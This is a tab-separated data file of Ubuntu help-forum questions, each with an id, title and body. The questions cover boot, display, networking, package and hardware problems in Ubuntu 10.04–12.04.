127653	speeding up computer	after running update manager on my computer and finished its job , my computer runs slower than past . moreover , opening time of my computer , pushing power on button , takes more time . cpu usage of xorg is high if i compare it with past . how can i speed up my computer ? note : ubuntu 10.04
127654	ubuntu one for android not uploading	since upgrading last week files do not upload to the cloud . i have tried various file managers and none of them make any difference . after selecting the file to 'add ' nothing happens and in the ubuntu file list the file date remains unchanged although in file manager it is modified .
127662	grub rescue problem after installing ubuntu 12.04 lts	i have dual boot with window 7 and ubuntu 11.10 . yesterday i tired installing ubuntu 12.04 lts , by manually removing all ubuntu 11.10 partitions , creating new partitions and installing ubuntu 12.04 lts , but then i got this error . error : unknown filesystem grub rescue > the thing is when i let ubuntu do partitioning for me it solves the problem , but i always do my own partitioning and it was working with me before , what had changed in ubuntu 12.04 lts ? i have both windows 7 and ubuntu 12.04 lts on same hard drive , and the partitions for ubuntu that i have are : / /boot swap /home i am not an experienced ubuntu user and i hope i am not missing any necessary details , but please feel free to ask . thanks in advance
127664	dual monitors not detected in ubuntu 12.04 ( ati radeon hd )	i am new to ubuntu and really would like to replace windows with it . one problem i am now running into is to make the second screen working . i have an optiplex 990 , which comes with an internal intel 2000 graphic card and an asus ati radeon hd 6570 . each graphic card is connected to one 24 '' monitor . when i start ubuntu 12.04 from usb stick , the boot menu shows on the intel monitor . then the ubuntu ... .-loading-logo appears on the second ati monitor . then the actual ubuntu workspace loads on the intel monitor again and the ati monitor goes into power save mode . doing this i get : lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati turks [ radeon hd 6570 ] therefore the screen you see here is only the intel driven one . the ati one is forgotten . i ended up installing the ati driver from their website . and went through the steps as described here : after installing it , i still get the following : ubuntu @ ubuntu : ~/downloads $ fglrxinfo display : :0 screen : 0 opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) sandybridge desktop opengl version string : 1.4 ( 3.0 mesa 8.0.2 ) which is expected , as my ati connected screen is disabled . taking a glance at /etc/x11/xorg.conf section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection i do n't know what else i could do . is here any pro that could help me solving this issue ? many thanks ,
127666	no grub menu for 11.10 and 12.04lts	i 'm already on 11.10 and out of curiosity i installed 12.04 on a separate partition . but when i boot up my machine , it is going into 11.10 . it does n't show up grub menu to select which os i want to boot into . while installing from 12.04 , i selected the option 'something else ' and installed 12.04 on a separate partition . any ideas are appreciated .
127675	how to set an nfs network ?	i want to merge information found here and there in order to record in one answer all steps to set my nfs network between my two ubuntu pcs this is useful time to time , for example when switching to a new ubuntu version , i need to reset : nfs autofs ufw
127677	instal ubuntu to w2k machine	i have a dilapidated pc at home i want to turn turn into a server ( probably with debian on it in the end ) . my first thoughts were to install ubuntu through the live-boot usb but for some reason , i can not get it to boot properly , i can tell the machine to boot from usb , and i can see a line that is familiar from the install process , but it does not proceed further ... i am unsure if this is because the machine is too old ( it is about 8 years old now , although some parts of it have been replaced over time ) . i have n't tried burning to a disc yet , i shall try that later , but some suggestions would be nice as to what i am doing wrong ... some further details : no os on the machine currently , was originally running w2000 distribution matches instruction-set tried installing redhat a while back , couldnt get it to install correctly either ( x-org would n't configure )
127678	wired internet does n't work on ubuntu 12.04	wired internet works on windows but does n't work on ubuntu 12.04 . i set it up manually . i am sure i did everything correctly . it even says connection established but internet does n't work in any program . i installed it on my pc . i did n't delete windows yet . my settings : ipv4 ip : 192.168.1.2 netmask : 255.255.255.0 gateway : 192.168.1.1 dns servers : 213.145.129.20,213.145.129.19 my router : tp-link td-w8101g
127679	ubuntu upgrade wants administrative password	aloha - when selecting 'upgrade '' for 11.10 ( in this case ) the app loads two files , provides an informational screen , then asks for me to `` enter the administrative password . '' i know my username and password ( which i use to make other changes ) and i am the only user on the server , but my password does not work and i get kicked out after three attempts . what could this be ?
127680	how can i use multi-monitor in my computer ?	i have a `` multi-monitor '' system on my desktop . my main screen is connected via dvi ( a samsung sync master , 1680x1050 ) and the other screen is a lg samsung ( full hd 1920x1080 ) that is connected via hdmi . both are in the same graphics card , a asus geforce gtx 550 top . the problem is that i ca n't use them both as i use on windows or on my netbook . my netbook ( an asus 1215p ) automatic detects all kind of screens under the settings that come with ubuntu 12.04 ( i think in english is called screens , not sure ) . on my desktop , those settings only show one screen and call it as a `` laptop screen '' . i went to x server settings and my tv appeared there . i activated it , and set `` separate x screen '' ( or something like that ) . i saved the settings and then i rebooted . my tv screen was all grey and my mouse was a big `` x '' . i could n't move any window between screens . i went back to x server settings and activated xinerama . when i rebooted , multi-monitor was working , i could move windows between screens , and the login screen ever adapted to where my mouse was . but with xinerama , my unity 3d became 2d , and ubuntu keeps giving me `` system error '' dialogs . how can i set my multi-monitor system correctly with unity 3d and no errors ? ps : my ubuntu is 12.04 64-bits
127681	how can i change the keyboard shortcut to switch lenses ?	the keyboard shortcut to change lenses in 12.04 has changed from being tab to being : ctrl+tab and ctrl+shift+tab . as answered in this question : keyboard shortcut for switching lenses i can see that this was probably done to improve navigation as you can now choose which direction you want to navigate through the lenses , however i 'm a bit stuck in my ways and would like to know if the behaviour can be switched back so that just tab switches lenses .
127682	how to solve `` error splicing file '' io while copying files ?	i 've recently backed up some files on an external hard drive in order to install ubuntu 12.04 . but when i wanted to copy the backed up files ( ex . music files ) back to home folder , i 'm prompted with this : error splicing file : input/output error i need help because i 'm unable to have my files back on my computer .
127683	how do i enter polish characters ?	i just installed ubuntu 12.04 and ... i 've got a problem : ) i 'm living in poland , so i want to write texts in polish with polish chars such as ąćęłńóśźż , too . unfortunately , it 's impossible . we write polish chars by pressing altgr and chosen key ( e.g . : altgr + a = ą , altgr + x = ź , altgr + c = ć , etc . ) , but when i press altgr , it is n't like pressing altgr , it 's like pressing alt - i can open menus with their mnemonics , and i ca n't enter polish chars . i 've got , of course keyboard layout set to polish . and btw . - in oneiric there was everything ok ... so my question is : how to fix it ?
127688	need to repair or reinstall ubuntu 12.04 without losing programs or data	i was trying to change the ownership on an external drive , and mistakenly used sudo chown -rl myuser : myuser /media/ '' new volume '' unfortunately , it changed the ownership on the entire drive to myuser . i 've since changed the ownership back to root on everything except the /home/myuser directory . but , i still have problems , such as google-chrome did n't work anymore , i ca n't see mounted drives , and pulseaudio does n't work . ( there are probably more -- but these were enough to make me want to fix this ) . i downloaded the ubuntu 12.04 lts dvd ( x86_64 ) and am booted into it right now . when i try to do the installation , i do n't have an option to `` upgrade from 12.04 to 12.04 '' ( possibly this is due to the fact that i have two partitions : ubuntu 12.04 linux from scratch so my questions are these : how do i do an upgrade ( if possible ) ? if i have to reinstall , and choose not to format the partition that my / is on ( which includes /home , /bin , /usr , /etc , and so on ) , what will i lose ( it says that it will delete everything in /etc /usr /bin ... . ) ?
127689	how do i change the chat font in skype 2.2.0.35 ?	is there a way to change the font used by skype for chat ?
127690	12.04 boots to black screen ati radeon hd 3200	after upgrading from oneiric to ubuntu precise booting ends up in a black screen with no whatsoever reaction . there is a short flicker showing the login screen before turning black , during which i can get to a login terminal via ctr+alt+f1 . already tried removing xorg.conf , uninstalling compiz , setting grub options to nomodeset or raden.modeset=0 , re-installing xorg . nothing would help . please help ! thanks , alice
127692	how do i change the default session for all users ?	i 'm trying to change the default session manager for all existing users and new users , from unity to something else . i cant seem to find the file were this info is stored or a command to change it . i 'm running ubuntu 12.04 any help would be greatly appreciated ...
127695	force specific letter for usb drive in /dev/sd*	is there a way to force an usb drive to always get a specific letter in /dev/sd* ? i know about udev symlinks , that does not help .
127696	ubuntu 12.04 very slow on samsung netbook	i have a samsung netbook n150 1gb ram ( intel graphic card ) , 1,66ghz intel atom processor . it was working great with the ubuntu 10.04 netbook edition , really fast boot very eficient but i have updated to 12.04 ( the netbook edition does n't exist anymore ) and now the system is so slow : slow boot , sometimes it does n't even boot properly , strange screen light on and off behaviour , when you click on an icon takes for ever to open the app even the terminal it takes like more than 10s ! it seems that this new distro was made for a far more powerful systems than this netbook . i am considering to revert back to 10.04 or choose another linux distro but is there anythhing i can do to fix these problems ? any body else had similar problems . thanks in advance
127697	how do i fix a `` e : impossible to read the sources list . '' error ?	i 've upgraded my system from ubuntu 11.10 to 12.04 yesterday and it gave such serious problems that i had to format the partition and re-install the os from scratch this morning . now , i fixed all the main problems , but still i needed to install the old synaptic since i need some specific software i could not find in the software center . after installing synaptic from terminal , i was not anymore able to use nor software center , nor synaptic . they open and then close immediately without any message . the only thing synaptic says is ( sorry : i0m translating the message from italian ) : e : line 59 in /etc/apt/sources.list is not correct ( dist parse ) e : impossible to read the sources list . check the problem in the repository configuration . e : _cache- > open ( ) , failed , please report . what should i do ? thank you every body for your help !
127698	how can i install unity in kubuntu 12.04 ?	i 'd like to try unity , but i 'm running kubuntu 12.04 ( 64-bit ) . how i can i install the unity desktop environment ? i tried `` sudo apt-get install unity '' , but after installation and choosing `` gnome '' from the login screen , it fails and displays an error dialog saying that the gnome environment can not be loaded .
127700	how can i compile a program and update an program already installed	so i have vsftpd 2.3.5 installed ( using apt-get ) and i want to install vsftpd-ext . but i have to compile it my self and install . how can i install it so that it updates the version installed by apt-get and i still can run , for example , service vsftpd start as i did it now the program is just installed `` side by side '' and not updated the already installed version . ( following this guide : http : //www.thegeekstuff.com/2010/11/vsftpd-setup/ )
127701	gcc -m32 can not find libraries	both 32 and 64 bit compiles worked and then i upgraded from 11.10 to 12.04 . now -m64 works but -m32 ca n't find libraries . i 've tried reinstalling libraries , and gcc-multilib but no joy . anyone spot something i 've missed ? david gcc -m32 -wall -w -l/usr/lib/x86_64-linux-gnu/libusb-1.0.so.0 -lusb-1.0 -lx11 lmss.c -o lmss32 /usr/bin/ld : skipping incompatible /usr/local/lib/libusb-1.0.so when searching for -lusb-1.0 /usr/bin/ld : skipping incompatible /usr/local/lib/libusb-1.0.a when searching for -lusb-1.0 /usr/bin/ld : can not find -lusb-1.0 /usr/bin/ld : can not find -lx11 collect2 : ld returned 1 exit status locate libusb-1.0 /home/david/downloads/libusb-1.0.8 /home/david/downloads/libusb-1.0.8.tar.bz2 /home/david/downloads/libusb-1.0.8/authors /home/david/downloads/libusb-1.0.8/copying /home/david/downloads/libusb-1.0.8/changelog /home/david/downloads/libusb-1.0.8/install /home/david/downloads/libusb-1.0.8/makefile /home/david/downloads/libusb-1.0.8/makefile.am /home/david/downloads/libusb-1.0.8/makefile.in /home/david/downloads/libusb-1.0.8/news /home/david/downloads/libusb-1.0.8/porting /home/david/downloads/libusb-1.0.8/readme /home/david/downloads/libusb-1.0.8/thanks /home/david/downloads/libusb-1.0.8/todo /home/david/downloads/libusb-1.0.8/aclocal.m4 /home/david/downloads/libusb-1.0.8/compile /home/david/downloads/libusb-1.0.8/config.guess /home/david/downloads/libusb-1.0.8/config.h /home/david/downloads/libusb-1.0.8/config.h.in /home/david/downloads/libusb-1.0.8/config.log /home/david/downloads/libusb-1.0.8/config.status /home/david/downloads/libusb-1.0.8/config.sub /home/david/downloads/libusb-1.0.8/configure /home/david/downloads/libusb-1.0.8/configure.ac /home/david/downloads/libusb-1.0.8/depcomp /home/david/downloads/libusb-1.0.8/doc /home/david/downloads/libusb-1.0.8/examples /home/david/downloads/libusb-1.0.8/install-sh /home/david/downloads/libusb-1.0.8/libtool /home/david/downloads/libusb-1.0.8/libusb /home/david/downloads/libusb-1.0.8/libusb-1.0.pc /home/david/downloads/libusb-1.0.8/libusb-1.0.pc.in /home/david/downloads/libusb-1.0.8/ltmain.sh /home/david/downloads/libusb-1.0.8/missing /home/david/downloads/libusb-1.0.8/stamp-h1 /home/david/downloads/libusb-1.0.8/doc/makefile /home/david/downloads/libusb-1.0.8/doc/makefile.am /home/david/downloads/libusb-1.0.8/doc/makefile.in /home/david/downloads/libusb-1.0.8/doc/doxygen.cfg /home/david/downloads/libusb-1.0.8/doc/doxygen.cfg.in /home/david/downloads/libusb-1.0.8/examples/.deps /home/david/downloads/libusb-1.0.8/examples/makefile /home/david/downloads/libusb-1.0.8/examples/makefile.am /home/david/downloads/libusb-1.0.8/examples/makefile.in /home/david/downloads/libusb-1.0.8/examples/dpfp.c /home/david/downloads/libusb-1.0.8/examples/dpfp_threaded.c /home/david/downloads/libusb-1.0.8/examples/lsusb.c /home/david/downloads/libusb-1.0.8/examples/.deps/dpfp.po /home/david/downloads/libusb-1.0.8/examples/.deps/dpfp_threaded-dpfp_threaded.po /home/david/downloads/libusb-1.0.8/examples/.deps/lsusb.po /home/david/downloads/libusb-1.0.8/libusb/.deps /home/david/downloads/libusb-1.0.8/libusb/.libs /home/david/downloads/libusb-1.0.8/libusb/makefile /home/david/downloads/libusb-1.0.8/libusb/makefile.am /home/david/downloads/libusb-1.0.8/libusb/makefile.in /home/david/downloads/libusb-1.0.8/libusb/core.c /home/david/downloads/libusb-1.0.8/libusb/descriptor.c /home/david/downloads/libusb-1.0.8/libusb/io.c /home/david/downloads/libusb-1.0.8/libusb/libusb-1.0.la /home/david/downloads/libusb-1.0.8/libusb/libusb.h /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-core.lo /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-core.o /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-descriptor.lo /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-descriptor.o /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-io.lo /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-io.o /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-linux_usbfs.lo /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-linux_usbfs.o /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-sync.lo /home/david/downloads/libusb-1.0.8/libusb/libusb_1_0_la-sync.o /home/david/downloads/libusb-1.0.8/libusb/libusbi.h /home/david/downloads/libusb-1.0.8/libusb/os /home/david/downloads/libusb-1.0.8/libusb/sync.c /home/david/downloads/libusb-1.0.8/libusb/.deps/libusb_1_0_la-core.plo /home/david/downloads/libusb-1.0.8/libusb/.deps/libusb_1_0_la-darwin_usb.plo /home/david/downloads/libusb-1.0.8/libusb/.deps/libusb_1_0_la-descriptor.plo /home/david/downloads/libusb-1.0.8/libusb/.deps/libusb_1_0_la-io.plo /home/david/downloads/libusb-1.0.8/libusb/.deps/libusb_1_0_la-linux_usbfs.plo /home/david/downloads/libusb-1.0.8/libusb/.deps/libusb_1_0_la-sync.plo /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb-1.0.a /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb-1.0.la /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb-1.0.lai /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb-1.0.so /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb-1.0.so.0 /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb-1.0.so.0.0.0 /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb_1_0_la-core.o /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb_1_0_la-descriptor.o /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb_1_0_la-io.o /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb_1_0_la-linux_usbfs.o /home/david/downloads/libusb-1.0.8/libusb/.libs/libusb_1_0_la-sync.o /home/david/downloads/libusb-1.0.8/libusb/os/darwin_usb.c /home/david/downloads/libusb-1.0.8/libusb/os/darwin_usb.h /home/david/downloads/libusb-1.0.8/libusb/os/linux_usbfs.c /home/david/downloads/libusb-1.0.8/libusb/os/linux_usbfs.h /lib/x86_64-linux-gnu/libusb-1.0.so.0 /lib/x86_64-linux-gnu/libusb-1.0.so.0.1.0 /usr/include/libusb-1.0 /usr/include/libusb-1.0/libusb.h /usr/lib/x86_64-linux-gnu/libusb-1.0.a /usr/lib/x86_64-linux-gnu/libusb-1.0.so /usr/lib/x86_64-linux-gnu/libusb-1.0.so.0 /usr/lib/x86_64-linux-gnu/pkgconfig/libusb-1.0.pc /usr/local/include/libusb-1.0 /usr/local/include/libusb-1.0/libusb.h /usr/local/lib/libusb-1.0.a /usr/local/lib/libusb-1.0.la /usr/local/lib/libusb-1.0.so /usr/local/lib/libusb-1.0.so.0 /usr/local/lib/libusb-1.0.so.0.0.0 /usr/local/lib/pkgconfig/libusb-1.0.pc /usr/share/doc/libusb-1.0-0 /usr/share/doc/libusb-1.0-0-dev /usr/share/doc/libusb-1.0-0/readme /usr/share/doc/libusb-1.0-0/changelog.debian.gz /usr/share/doc/libusb-1.0-0/copyright /usr/share/doc/libusb-1.0-0-dev/porting /usr/share/doc/libusb-1.0-0-dev/readme /usr/share/doc/libusb-1.0-0-dev/changelog.debian.gz /usr/share/doc/libusb-1.0-0-dev/copyright /usr/share/doc/libusb-1.0-0-dev/html /usr/share/doc/libusb-1.0-0-dev/html/annotated.html /usr/share/doc/libusb-1.0-0-dev/html/bc_s.png /usr/share/doc/libusb-1.0-0-dev/html/caveats.html /usr/share/doc/libusb-1.0-0-dev/html/classes.html /usr/share/doc/libusb-1.0-0-dev/html/closed.png /usr/share/doc/libusb-1.0-0-dev/html/contexts.html /usr/share/doc/libusb-1.0-0-dev/html/doxygen.css /usr/share/doc/libusb-1.0-0-dev/html/doxygen.png /usr/share/doc/libusb-1.0-0-dev/html/dynsections.js /usr/share/doc/libusb-1.0-0-dev/html/files.html /usr/share/doc/libusb-1.0-0-dev/html/functions.html /usr/share/doc/libusb-1.0-0-dev/html/functions_vars.html /usr/share/doc/libusb-1.0-0-dev/html/group__asyncio.html /usr/share/doc/libusb-1.0-0-dev/html/group__desc.html /usr/share/doc/libusb-1.0-0-dev/html/group__dev.html /usr/share/doc/libusb-1.0-0-dev/html/group__lib.html /usr/share/doc/libusb-1.0-0-dev/html/group__misc.html /usr/share/doc/libusb-1.0-0-dev/html/group__poll.html /usr/share/doc/libusb-1.0-0-dev/html/group__syncio.html /usr/share/doc/libusb-1.0-0-dev/html/index.html /usr/share/doc/libusb-1.0-0-dev/html/io.html /usr/share/doc/libusb-1.0-0-dev/html/libusb_8h_source.html /usr/share/doc/libusb-1.0-0-dev/html/modules.html /usr/share/doc/libusb-1.0-0-dev/html/mtasync.html /usr/share/doc/libusb-1.0-0-dev/html/nav_f.png /usr/share/doc/libusb-1.0-0-dev/html/nav_h.png /usr/share/doc/libusb-1.0-0-dev/html/open.png /usr/share/doc/libusb-1.0-0-dev/html/packetoverflow.html /usr/share/doc/libusb-1.0-0-dev/html/pages.html /usr/share/doc/libusb-1.0-0-dev/html/structlibusb__config__descriptor.html /usr/share/doc/libusb-1.0-0-dev/html/structlibusb__control__setup.html /usr/share/doc/libusb-1.0-0-dev/html/structlibusb__device__descriptor.html /usr/share/doc/libusb-1.0-0-dev/html/structlibusb__endpoint__descriptor.html /usr/share/doc/libusb-1.0-0-dev/html/structlibusb__interface.html /usr/share/doc/libusb-1.0-0-dev/html/structlibusb__interface__descriptor.html /usr/share/doc/libusb-1.0-0-dev/html/structlibusb__iso__packet__descriptor.html /usr/share/doc/libusb-1.0-0-dev/html/structlibusb__pollfd.html /usr/share/doc/libusb-1.0-0-dev/html/structlibusb__transfer.html /usr/share/doc/libusb-1.0-0-dev/html/tab_a.png /usr/share/doc/libusb-1.0-0-dev/html/tab_b.png /usr/share/doc/libusb-1.0-0-dev/html/tab_h.png /usr/share/doc/libusb-1.0-0-dev/html/tab_s.png /usr/share/doc/libusb-1.0-0-dev/html/tabs.css /usr/share/doc/libusb-1.0-0-dev/html/version_8h_source.html /usr/share/doc-base/libusb-1.0-0-dev /var/cache/apt/archives/libusb-1.0-0-dev_2 % 3a1.0.9~rc3-2ubuntu1_amd64.deb /var/cache/apt/archives/libusb-1.0-0_2 % 3a1.0.9~rc3-2ubuntu1_amd64.deb /var/lib/doc-base/documents/libusb-1.0-0-dev /var/lib/doc-base/omf/libusb-1.0-0-dev /var/lib/doc-base/omf/libusb-1.0-0-dev/libusb-1.0-0-dev-c.omf /var/lib/dpkg/info/libusb-1.0-0-dev.list /var/lib/dpkg/info/libusb-1.0-0-dev.md5sums /var/lib/dpkg/info/libusb-1.0-0 : amd64.list /var/lib/dpkg/info/libusb-1.0-0 : amd64.md5sums /var/lib/dpkg/info/libusb-1.0-0 : amd64.postinst /var/lib/dpkg/info/libusb-1.0-0 : amd64.postrm /var/lib/dpkg/info/libusb-1.0-0 : amd64.shlibs
127704	how can i change the auto-hide function of launcher to work better ?	i 'm new to ubuntu , 11.10 was the first version of ubuntu i used , it was very good . i 've just made a new install of 12.04 ( clean install , not upgrade ) , it 's also very good too but the auto-hide function of launcher is really annoying , it does n't show up when i move the mouse ( or even click many times ) to its area on the left . does anyone else experience this problem ? is there a way to overcome this ? thank you .
127710	mount nfs share as a shortcut	i recently purchased a netgear readynas and have a question about mounting an nfs volume . firstly i know how to mount the share in fstab . there is a lot of information around that describes how to do that . i really do n't want to do that . what i want to do is have a shortcut or launcher that i can execute which will mount the nfs share for me ( for example mounting it to ~/music ) . when i plug in a usb drive xubuntu automatically puts a drive icon shortcut on my desktop and allows me to 'eject ' . is this possible ? does it make sense ? i am using xubuntu 11.10 . i have been doing research to solve this problem and i have come up with two possibilities : 1 ) create a shell script or 2 ) autofs . i am not sure which is better . i am more comfortable with shell scripting than autofs . the problem with the shell scripting is that i 'll need sudo permissions . what i have read about autofs it might be the best solution . is there a way to setup autofs so that i can keep the configuration files within the users home folder ?
127718	error : invalid arch independent elf magic . dual boot with ssd	i am currently trying at get an dual boot computer work , where the ubuntu 12.04 system is spread over two drives . the setup of the two drives are : hdd /dev/sda1 /boot/efi /dev/sda2 some unknown msftres at 128mb ( dont bother about this as long as the rest works ) /dev/sda3 windows7 /dev/sda4 /home /dev/sda5 swap /dev/sda6 /tmp /dev/sda7 /var ssd /dev/sdb1 / in an attempt to combine speed with sdd survival . now , that might be a topic in itself , but for now i would be very happy just to get the grub bootloader to work . when booting at either hdd or ssd , i get : error : invalid arch independent elf magic . grub rescue > very grateful for all kinds of suggestions for how to solve this !
127724	how can i develop desktop applications using web standards ?	i want to develop applications for ubuntu using web standards such as html5 , javascript css3 . webstandards are growing very fast today , one can develop cross-platform mobile applications using these easily . every one is shifting to this since the release of html5 and css3 . we can even develop online . i know about titanium and other frameworks . what are some applications that are cross-platform , open source and free and open in nature if possible . the more the platforms the better , but ubuntu specific ones which access the native ubuntu apis are preferred . i know we can use quickly , but i am talking about web standards . can i develop with qt using html5 ? i have seen it in qt create project wizard , but i am somewhat confused . can i develop using qt qml for ubuntu and other platforms ? i know that we can develop for symbyan and meego devices . but if i can for these others it will be very useful .
127727	broken dependencies due to libjackd	so i proudly updated my linux distro for the first time and thereafter got a problem . i 'm running ubuntu unity 2d ( usually ) 12.04 ( since today ) on a 64 bit computer . indeed , the first upgrade -- i made the upgrade through the update manager -- was okay ( even if i was surprised by the amount of i386 packages that had to be installed ) . then , i re-enabled the repositories that had been disabled because of the upgrade and updated my system . i was told to perform a 'partial upgrade ' , that i did , but was once again surprised by the amount of i386 packages installed and also by the fact that lmms ( https : //launchpad.net/lmms ) was being removed ; wine , among others , was also being updated and that 's probably the reason because lmms depends on certain versions of wine ( i just know this , for the rest i 'm a total noob ) . anyway , this leaded me to the broken dependencies gstreamer0.10-plugins-good : i386 and libasound2-plugins : i386 . synaptic also constantly tries to install libjack-jackd2-0 : i386 , but each time it gets an error . i do n't know if all this is wine or lmms related , but it maybe can help ... i was told to perform : 'sudo apt-get -f install ' by synaptic but it apparently failed : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libxml++2.6-2 librtaudio4 libx264-116 libfluidsynth1 lmms-common librtmidi1 wine-gecko1.4 wine-gecko1.4 : i386 libffado2 stk libconfig++8 libstk0c2a use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libjack-jackd2-0 : i386 suggested packages : jackd2 : i386 the following new packages will be installed : libjack-jackd2-0 : i386 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/202 kb of archives . after this operation , 493 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 249517 files and directories currently installed . ) unpacking libjack-jackd2-0 : i386 ( from ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/buildinfo.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) must i remove those broken packages via synaptic ? i would like to understand that problem as i ca n't install anything new from the software center . thanks everyone !
127730	how to convert an ogv video to an wmv video ?	is there an application for ubuntu 12.04 to direcly convert an ogv video exceeding 200 mb into an wmv video possibly with a simple gui ( no terminal , no scripts ) . is there such an application for multiple conversions ? i tried to employ divx but i was not able to make a check because the lower part of the divx window was out of the screen of my netbook . many thanks in advance and best regards .
127732	how to remove/delete podcast feed in rhythmbox ?	what can i tell you , i do n't really know how to expand on the title . i do n't know how to remove a podcast feed . i tried right clicking the podcast feed , when i do that it gives me two options : new podcast feed ... update all podcasts and none of the top menus have anything that suggests removal or deletion of a feed . i 'm astonished i ca n't figure this out .
127737	loud pop on shutdown/reboot	everytime i shut my computer down or reboot it there is a very loud pop/crack from the speakers . it sounds dangerous , like they are going to blow up . is there a way to automatically mute the volume on shutdown ?
127738	how to test a newly created /etc/init/xx.conf file ?	i created a /etc/init/xx.conf file , but do n't know how to test it . it 's now like stuff stored in /etc/init.d , which can use service command .
127741	update manager downloaded updates but ca n't install them	i am using 11.10 and have some problems with update manager . when i opening update manager it 's saying that i have some updates to install . when i press button install updates , update manager brings the following window : my software sources settings is : can anyone say what is the problem ? thanks .
127743	ubuntu 12.04 and 3d	in my sony vaio , the graphic card is 'advanced micro devices [ amd ] nee ati rv710 [ mobility radeon hd 4500/5100 series ] ' . i am not able to use the 3d effects in ubuntu 12.04 .
127745	opening another instance of a program ?	i am testing out the use of sakura instead of the gnome terminal . os is ubuntu 12.04 precise . i often have multiple terminal windows open . how do you tell it to open a second window ? right clicking does not give you the option ; and there is no menu along the top . is there a way to enable an `` open another instance '' option with right clicking ? or else , how to go about it ?
127751	editing icons and icon sequence in the launcher ?	how do you edit the icons in the launcher ? i am particularly interested in `` bumping up '' higher some of my more frequently used software icons that i have locked to the launcher . unity seems to dictate a fairly rigid way of doing things while allowing less room for personalisation .
127753	wallpaper clock screenlet not working in 12.04	i spent all morning making a wallpaper clock in gimp , i downloaded screenlets from the software centre , then downloaded and installed the wallpaper clock screenlet and installed my wallpaper successfully , only to find wallpaper clocks do n't work in 12.04 . is there any particular reason for this ? is there an easy fix ?
127754	purpose of file in ubuntu	there are lots of important file in ubuntu . but , how can i learn which file is for what ? in other words , i want know why they is used for . where can i learn the purpose of file in ubuntu ? ex /var/cache/apt/archives is for what ?
127757	how do i make modprobe changes permanent ?	i have been having several issues with my touchpad since upgrading to 12.04lts . i believe it is an issue with the elantech driver . i have found that the following commands fix my problem , however , the changes seem to be reverted when i reboot . modprobe -r psmouse modprobe psmouse proto=imps is there a way i can make these changes permanent ?
127759	dual booting slow	( text translated with google ) good morning guys ... next i installed on my dell inspiron 1525 notebook ubuntu 12.04 in dual boot with vista . but i did not know what happens to install everything right , but it is more slow . i do not know what happens ! when i take the mouse on top of a program takes a few seconds to appear to me as if you were to click and type without a windows defrag is that when you click a half hour running the ball to start the program . please someone help me i liked ubuntu but with it so i do not have to use . i thank the attention of all who are reading my problem . follow the below configuration my notebook family of chipsets intel 965 express memory 2.0 intel celeron ( r ) cpu 550 @ 2.00ghz type 32-bit disc 50.2 note a : when i click on graph to the unit is unknown and experience is standard .
127766	how to play realmedia videos embedded within firefox ?	i 've installed real player from medibuntu ( 64 bits version ) . it works well to read downloaded real media videos but not for embedded rm videos . i 've the `` helix dna plugin : realplayer g2 plug-in compatible '' within the firefox about : plugins but embedded videos do n't work . those videos are using this html code : < object classid= '' clsid : cfcdaa03-8be4-11cf-b84b-0020afbbccfa '' > thanks for your help
127769	wubi install on amd64 - wo n't boot to ubuntu 12.04 lts	have successfully installed ubuntu on 3 other machines 2 x 11.10 and 1 x 12.04lts but having problems with : dell inspiron 1721 amd turion 64 2ghz with 2 gb ram , 320gb hd with 100gb free running vista home premium . downloaded and installed 12.04lts via wubi , setting 20gb size to test machine . all appears ok until the reboot . loads the ubuntu splash screen then displays the following : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/08a89a44a89e2fe4 does not exist . dropping to a shell any ideas as to why it wo n't boot to ubuntu ? managed to identify additional messages when trying to boot : try ( hd0,0 ) fat16 no wubildr ; try ( hd0,1 ) ntfs5 no wubildr ; try ( hd0,2 ) ntfs5 error : `` prefix '' is not set does this help ?
